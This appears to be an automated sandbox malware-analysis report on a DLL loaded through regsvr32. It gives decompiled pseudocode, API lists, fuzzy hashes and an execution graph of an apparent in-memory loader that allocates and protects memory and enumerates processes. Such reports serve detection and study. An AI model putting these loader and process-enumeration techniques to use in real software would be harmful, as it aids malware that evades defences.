                                                                                                  0x18000d7f3
                                                                                                  0x18000d7ff
                                                                                                  0x18000d808
                                                                                                  0x18000d80e
                                                                                                  0x18000d811
                                                                                                  0x18000d814
                                                                                                  0x18000d818
                                                                                                  0x18000d81d
                                                                                                  0x18000d825
                                                                                                  0x18000d82d
                                                                                                  0x18000d834
                                                                                                  0x18000d839
                                                                                                  0x18000d83f
                                                                                                  0x18000d844
                                                                                                  0x18000d84e
                                                                                                  0x18000d850
                                                                                                  0x18000d860
                                                                                                  0x18000d862
                                                                                                  0x18000d86a
                                                                                                  0x18000d873
                                                                                                  0x18000d888
                                                                                                  0x18000d88e
                                                                                                  0x18000d891
                                                                                                  0x18000d8a0
                                                                                                  0x18000d8a8
                                                                                                  0x18000d8ae
                                                                                                  0x18000d8b1
                                                                                                  0x18000d8b6
                                                                                                  0x18000d8bb
                                                                                                  0x18000d8c3
                                                                                                  0x18000d8c7
                                                                                                  0x18000d8cc
                                                                                                  0x18000d8cf
                                                                                                  0x18000d8d8
                                                                                                  0x18000d8dd
                                                                                                  0x18000d8e2
                                                                                                  0x18000d8e8
                                                                                                  0x18000d8f1
                                                                                                  0x18000d907
                                                                                                  0x18000d915
                                                                                                  0x18000d91c
                                                                                                  0x18000d926
                                                                                                  0x18000d92d
                                                                                                  0x18000d931
                                                                                                  0x18000d93a
                                                                                                  0x18000d93a
                                                                                                  0x18000d93e
                                                                                                  0x18000d94d
                                                                                                  0x18000d957
                                                                                                  0x18000d95d
                                                                                                  0x18000d960
                                                                                                  0x18000d96a
                                                                                                  0x18000d97b
                                                                                                  0x18000d983
                                                                                                  0x18000d985
                                                                                                  0x18000d997
                                                                                                  0x18000d9a7
                                                                                                  0x18000d9a9
                                                                                                  0x18000d9ac
                                                                                                  0x18000d9b1
                                                                                                  0x18000d9b3
                                                                                                  0x18000d9c8
                                                                                                  0x18000d9cf
                                                                                                  0x18000d9d8
                                                                                                  0x18000d9da
                                                                                                  0x18000d9de
                                                                                                  0x18000d9e0
                                                                                                  0x18000d9ed
                                                                                                  0x18000d9f3
                                                                                                  0x18000d9f6
                                                                                                  0x18000d9f9
                                                                                                  0x18000da01
                                                                                                  0x18000da2c

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                  • String ID:
                                                                                                  • API String ID: 2718003287-0
                                                                                                  • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                  • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                                  • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                  • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000DEE0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 28%
                                                                                                  			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed long long _v88;
				void* _v96;
				void* _v108;
				signed int _v112;
				intOrPtr _v120;
				signed int _v124;
				long _v128;
				signed int _v136;
				long long _v144;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed short _t99;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed short _t127;
				signed int _t130;
				signed short _t133;
				signed short _t159;
				signed short _t167;
				signed long long _t180;
				signed int _t184;
				signed short* _t197;
				signed int _t204;
				signed int _t205;
				signed short* _t206;
				void* _t208;
				signed long long _t220;
				void* _t221;
				signed long long _t222;
				signed long long _t223;
				void* _t224;
				signed short* _t226;

				_t197 = __rdx;
				_t122 = __ebx;
				r14d = r8d;
				_t184 = __r9;
				_t206 = __rdx;
				if (r8d == 0) goto 0x8000e1d3;
				if (__rdx != 0) goto 0x8000df47;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v144 = __r9;
				_v152 = _t205;
				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
				goto 0x8000e1d5;
				_t220 = __ecx >> 6;
				_v88 = _t220;
				_t223 = __ecx + __ecx * 8;
				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
				_v136 = _t99;
				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
				_t23 = _t197 + 2; // 0x2
				r8d = _t23;
				E0000000118000E958(r15d);
				_v112 = _t205;
				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
				0x80006f60();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
				_t127 = _v136;
				_t159 = _t127;
				if (_t159 == 0) goto 0x8000e099;
				if (_t159 == 0) goto 0x8000e024;
				if (_t127 - 1 != 1) goto 0x8000e15d;
				_t221 = _t206 + _t224;
				_v128 = _t205;
				_t226 = _t206;
				if (_t206 - _t221 >= 0) goto 0x8000e090;
				r14d = _v124;
				_v136 =  *_t226 & 0x0000ffff;
				_t107 = E0000000118000E960( *_t226 & 0xffff);
				_t130 = _v136 & 0x0000ffff;
				if (_t107 != _t130) goto 0x8000e087;
				r14d = r14d + 2;
				_v124 = r14d;
				if (_t130 != 0xa) goto 0x8000e07c;
				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
				r14d = r14d + 1;
				_v124 = r14d;
				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
				goto 0x8000e038;
				_v128 = GetLastError();
				_t222 = _v88;
				goto 0x8000e153;
				r9d = r14d;
				_v152 = __r9;
				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
				asm("movsd xmm0, [eax]");
				goto 0x8000e158;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
				_t133 = _v136;
				_t167 = _t133;
				if (_t167 == 0) goto 0x8000e10c;
				if (_t167 == 0) goto 0x8000e0f8;
				if (_t133 - 1 != 1) goto 0x8000e164;
				r9d = r14d;
				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r8d = r14d;
				_v152 = _v152 & _t180;
				_v128 = _t180;
				_v120 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
				_t116 = GetLastError();
				_v128 = _t116;
				asm("movsd xmm0, [ebp-0x40]");
				asm("movsd [ebp-0x30], xmm0");
				if (_t116 != 0) goto 0x8000e1cc;
				_t117 = _v112;
				if (_t117 == 0) goto 0x8000e1a3;
				if (_t117 != 5) goto 0x8000e193;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
				 *((char*)(_t184 + 0x38)) = 1;
				 *(_t184 + 0x34) = _t117;
				goto 0x8000df3f;
				_t204 = _t184;
				E000000011800086B0(_v112, _t204);
				goto 0x8000df3f;
				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
				if ( *_t206 == 0x1a) goto 0x8000e1d3;
				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
				 *((char*)(_t184 + 0x38)) = 1;
				goto 0x8000df3f;
				goto 0x8000e1d5;
				return 0;
			}







































                                                                                                  0x18000dee0
                                                                                                  0x18000dee0
                                                                                                  0x18000def6
                                                                                                  0x18000defc
                                                                                                  0x18000deff
                                                                                                  0x18000df05
                                                                                                  0x18000df0e
                                                                                                  0x18000df10
                                                                                                  0x18000df15
                                                                                                  0x18000df18
                                                                                                  0x18000df1e
                                                                                                  0x18000df25
                                                                                                  0x18000df2d
                                                                                                  0x18000df30
                                                                                                  0x18000df35
                                                                                                  0x18000df3a
                                                                                                  0x18000df42
                                                                                                  0x18000df57
                                                                                                  0x18000df5b
                                                                                                  0x18000df5f
                                                                                                  0x18000df67
                                                                                                  0x18000df6c
                                                                                                  0x18000df73
                                                                                                  0x18000df7c
                                                                                                  0x18000df84
                                                                                                  0x18000df8b
                                                                                                  0x18000df8b
                                                                                                  0x18000df8f
                                                                                                  0x18000df97
                                                                                                  0x18000dfa9
                                                                                                  0x18000dfb8
                                                                                                  0x18000dfc2
                                                                                                  0x18000dfc7
                                                                                                  0x18000dfde
                                                                                                  0x18000dfe0
                                                                                                  0x18000dfe9
                                                                                                  0x18000e004
                                                                                                  0x18000e00a
                                                                                                  0x18000e00e
                                                                                                  0x18000e010
                                                                                                  0x18000e019
                                                                                                  0x18000e01e
                                                                                                  0x18000e024
                                                                                                  0x18000e028
                                                                                                  0x18000e02c
                                                                                                  0x18000e032
                                                                                                  0x18000e034
                                                                                                  0x18000e03f
                                                                                                  0x18000e043
                                                                                                  0x18000e048
                                                                                                  0x18000e04f
                                                                                                  0x18000e051
                                                                                                  0x18000e055
                                                                                                  0x18000e05d
                                                                                                  0x18000e071
                                                                                                  0x18000e073
                                                                                                  0x18000e076
                                                                                                  0x18000e083
                                                                                                  0x18000e085
                                                                                                  0x18000e08d
                                                                                                  0x18000e090
                                                                                                  0x18000e094
                                                                                                  0x18000e099
                                                                                                  0x18000e09c
                                                                                                  0x18000e0ab
                                                                                                  0x18000e0b0
                                                                                                  0x18000e0b7
                                                                                                  0x18000e0cc
                                                                                                  0x18000e0ce
                                                                                                  0x18000e0d2
                                                                                                  0x18000e0d4
                                                                                                  0x18000e0d9
                                                                                                  0x18000e0de
                                                                                                  0x18000e0e4
                                                                                                  0x18000e0f1
                                                                                                  0x18000e0f6
                                                                                                  0x18000e0f8
                                                                                                  0x18000e105
                                                                                                  0x18000e10a
                                                                                                  0x18000e10c
                                                                                                  0x18000e119
                                                                                                  0x18000e11e
                                                                                                  0x18000e12b
                                                                                                  0x18000e12e
                                                                                                  0x18000e136
                                                                                                  0x18000e13a
                                                                                                  0x18000e145
                                                                                                  0x18000e147
                                                                                                  0x18000e14d
                                                                                                  0x18000e153
                                                                                                  0x18000e158
                                                                                                  0x18000e16e
                                                                                                  0x18000e170
                                                                                                  0x18000e175
                                                                                                  0x18000e17a
                                                                                                  0x18000e17c
                                                                                                  0x18000e180
                                                                                                  0x18000e187
                                                                                                  0x18000e18b
                                                                                                  0x18000e18e
                                                                                                  0x18000e196
                                                                                                  0x18000e199
                                                                                                  0x18000e19e
                                                                                                  0x18000e1ad
                                                                                                  0x18000e1b2
                                                                                                  0x18000e1b4
                                                                                                  0x18000e1b8
                                                                                                  0x18000e1bc
                                                                                                  0x18000e1c3
                                                                                                  0x18000e1c7
                                                                                                  0x18000e1d1
                                                                                                  0x18000e1e5

                                                                                                  APIs
                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 953036326-0
                                                                                                  • Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                  • Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
                                                                                                  • Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                  • Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000DC50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 29%
                                                                                                  			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t97;
				void* _t99;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E0000000118000F880(0x1470, __rax, _t97, _t99);
				_t62 =  *0x80021010; // 0x5388a1408558
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0x8000dd91;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x8000dce6;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E0000000118000A154();
				if (0 == 0) goto 0x8000dd89;
				if (0 == 0) goto 0x8000dd79;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
				if (0 + _a24 < 0) goto 0x8000dd46;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0x8000dcbd;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
			}














                                                                                                  0x18000dc50
                                                                                                  0x18000dc55
                                                                                                  0x18000dc67
                                                                                                  0x18000dc6f
                                                                                                  0x18000dc79
                                                                                                  0x18000dc8a
                                                                                                  0x18000dc98
                                                                                                  0x18000dc9c
                                                                                                  0x18000dcb4
                                                                                                  0x18000dcba
                                                                                                  0x18000dcbd
                                                                                                  0x18000dcc3
                                                                                                  0x18000dccb
                                                                                                  0x18000dccd
                                                                                                  0x18000dcd8
                                                                                                  0x18000dcdf
                                                                                                  0x18000dce2
                                                                                                  0x18000dce6
                                                                                                  0x18000dcf8
                                                                                                  0x18000dcfa
                                                                                                  0x18000dd05
                                                                                                  0x18000dd13
                                                                                                  0x18000dd26
                                                                                                  0x18000dd2b
                                                                                                  0x18000dd35
                                                                                                  0x18000dd3e
                                                                                                  0x18000dd44
                                                                                                  0x18000dd46
                                                                                                  0x18000dd5b
                                                                                                  0x18000dd64
                                                                                                  0x18000dd6f
                                                                                                  0x18000dd77
                                                                                                  0x18000dd7e
                                                                                                  0x18000dd84
                                                                                                  0x18000dd8f
                                                                                                  0x18000ddbf

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                  • String ID: U
                                                                                                  • API String ID: 442123175-4171548499
                                                                                                  • Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                  • Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
                                                                                                  • Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                  • Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180004A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                  • Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                  • Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
                                                                                                  • Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                  • Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800109D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClassCursorLoadRegister
                                                                                                  • String ID: P
                                                                                                  • API String ID: 1693014935-3110715001
                                                                                                  • Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                  • Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
                                                                                                  • Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                  • Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:17.5%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:38
                                                                                                  Total number of Limit Nodes:4
                                                                                                  execution_graph 3047 e0a7f0 3048 e0a80b 3047->3048 3049 e0a8bc 3048->3049 3051 e1020c 3048->3051 3053 e1022b 3051->3053 3054 e10590 3053->3054 3055 e1e310 3053->3055 3054->3049 3056 e1e423 3055->3056 3057 e1e5f6 3056->3057 3059 e040a0 3056->3059 3057->3053 3061 e04116 3059->3061 3060 e041ca GetVolumeInformationW 3060->3057 3061->3060 3086 e22ab0 3089 e22aea 3086->3089 3087 e22c51 3088 e1e9e8 Process32FirstW 3088->3089 3089->3087 3089->3088 3062 e1e9e8 3065 e08bc8 3062->3065 3064 e1eab4 3067 e08c02 3065->3067 3066 e08eb8 3066->3064 3067->3066 3068 e08d6f Process32FirstW 3067->3068 3068->3067 3069 bb0000 3072 bb015a 3069->3072 3070 bb033f GetNativeSystemInfo 3071 bb0377 VirtualAlloc 3070->3071 3075 bb08eb 3070->3075 3073 bb0395 VirtualAlloc 3071->3073 3078 bb03aa 3071->3078 3072->3070 3072->3075 3073->3078 3074 bb0873 3074->3075 3076 bb08c6 RtlAddFunctionTable 3074->3076 3076->3075 3077 bb084b VirtualProtect 3077->3078 3078->3074 3078->3077 3079 e080cc 3082 e080f3 3079->3082 3080 e082ba 3082->3080 3083 e1e9e8 3082->3083 3084 e08bc8 Process32FirstW 3083->3084 3085 e1eab4 3084->3085 3085->3082

                                                                                                  Executed Functions

                                                                                                  Function 00BB0000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 bb0000-bb029a call bb091c * 2 13 bb02a0-bb02a4 0->13 14 bb0905 0->14 13->14 15 bb02aa-bb02ae 13->15 16 bb0907-bb091a 14->16 15->14 17 bb02b4-bb02b8 15->17 17->14 18 bb02be-bb02c5 17->18 18->14 19 bb02cb-bb02dc 18->19 19->14 20 bb02e2-bb02eb 19->20 20->14 21 bb02f1-bb02fc 20->21 21->14 22 bb0302-bb0312 21->22 23 bb033f-bb0371 GetNativeSystemInfo 22->23 24 bb0314-bb031a 22->24 23->14 26 bb0377-bb0393 VirtualAlloc 23->26 25 bb031c-bb0324 24->25 27 bb032c-bb032d 25->27 28 bb0326-bb032a 25->28 29 bb03aa-bb03ae 26->29 30 bb0395-bb03a8 VirtualAlloc 26->30 33 bb032f-bb033d 27->33 28->33 31 bb03dc-bb03e3 29->31 32 bb03b0-bb03c2 29->32 30->29 35 bb03fb-bb0417 31->35 36 bb03e5-bb03f9 31->36 34 bb03d4-bb03d8 32->34 33->23 33->25 37 bb03da 34->37 38 bb03c4-bb03d1 34->38 39 bb0419-bb041a 35->39 40 bb0458-bb0465 35->40 36->35 36->36 37->35 38->34 41 bb041c-bb0422 39->41 42 bb046b-bb0472 40->42 43 bb0537-bb0542 40->43 44 bb0448-bb0456 41->44 45 bb0424-bb0446 41->45 42->43 48 bb0478-bb0485 42->48 46 bb0548-bb0559 43->46 47 bb06e6-bb06ed 43->47 44->40 44->41 45->44 45->45 49 bb0562-bb0565 46->49 51 bb07ac-bb07c3 47->51 52 bb06f3-bb0707 47->52 48->43 50 bb048b-bb048f 48->50 57 bb055b-bb055f 49->57 58 bb0567-bb0574 49->58 59 bb051b-bb0525 50->59 55 bb087a-bb088d 51->55 56 bb07c9-bb07cd 51->56 53 bb07a9-bb07aa 52->53 54 bb070d 52->54 53->51 62 bb0712-bb0736 54->62 79 bb088f-bb089a 55->79 80 bb08b3-bb08ba 55->80 63 bb07d0-bb07d3 56->63 57->49 60 bb057a-bb057d 58->60 61 bb060d-bb0619 58->61 64 bb052b-bb0531 59->64 65 bb0494-bb04a8 59->65 60->61 68 bb0583-bb059b 60->68 72 bb061f 61->72 73 bb06e2-bb06e3 61->73 89 bb0738-bb073e 62->89 90 bb0796-bb079f 62->90 70 bb07d9-bb07e9 63->70 71 bb085f-bb086d 63->71 64->43 64->50 66 bb04aa-bb04cd 65->66 67 bb04cf-bb04d3 65->67 74 bb0518-bb0519 66->74 75 bb04e3-bb04e7 67->75 76 bb04d5-bb04e1 67->76 68->61 77 bb059d-bb059e 68->77 81 bb07eb-bb07ed 70->81 82 bb080d-bb080f 70->82 71->63 84 bb0873-bb0874 71->84 83 bb0625-bb0648 72->83 73->47 74->59 87 bb04e9-bb04fc 75->87 88 bb04fe-bb0502 75->88 85 bb0511-bb0515 76->85 86 bb05a0-bb0605 77->86 91 bb08ab-bb08b1 79->91 94 bb08eb-bb0903 80->94 95 bb08bc-bb08c4 80->95 92 bb07fb-bb080b 81->92 93 bb07ef-bb07f9 81->93 96 bb0822-bb082b 82->96 97 bb0811-bb0820 82->97 110 bb064a-bb064b 83->110 111 bb06b2-bb06b7 83->111 84->55 85->74 86->86 100 bb0607 86->100 87->85 88->74 98 bb0504-bb050e 88->98 101 bb0748-bb0754 89->101 102 bb0740-bb0746 89->102 90->62 106 bb07a5-bb07a6 90->106 91->80 103 bb089c-bb08a8 91->103 99 bb082e-bb083d 92->99 93->99 94->16 95->94 105 bb08c6-bb08e9 RtlAddFunctionTable 95->105 96->99 97->99 98->85 112 bb084b-bb085c VirtualProtect 99->112 113 bb083f-bb0845 99->113 100->61 108 bb0756-bb0757 101->108 109 bb0764-bb0776 101->109 107 bb077b-bb078d 102->107 103->91 105->94 106->53 107->90 126 bb078f-bb0794 107->126 118 bb0759-bb0762 108->118 109->107 119 bb064e-bb0651 110->119 115 bb06b9-bb06bd 111->115 116 bb06ce-bb06d8 111->116 112->71 113->112 115->116 120 bb06bf-bb06c3 115->120 116->83 121 bb06de-bb06df 116->121 118->109 118->118 123 bb065b-bb0666 119->123 124 bb0653-bb0659 119->124 120->116 125 bb06c5 120->125 121->73 128 bb0668-bb0669 123->128 129 bb0676-bb0688 123->129 127 bb068d-bb06a3 124->127 125->116 126->89 132 bb06ac 127->132 133 bb06a5-bb06aa 127->133 130 bb066b-bb0674 128->130 129->127 130->129 130->130 132->111 133->119
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.632524211.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_bb0000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
